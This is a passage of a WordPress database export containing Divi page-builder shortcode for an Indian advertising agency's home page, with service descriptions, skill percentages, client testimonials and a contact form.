_builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-03-23 11:48:40','2021-03-23 11:48:40','',134,'https://wthtest1.in8.cdn-alpha.com/?p=801',0,'revision','',0),(804,1,'2021-04-02 06:29:42','2021-04-02 06:29:42','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" 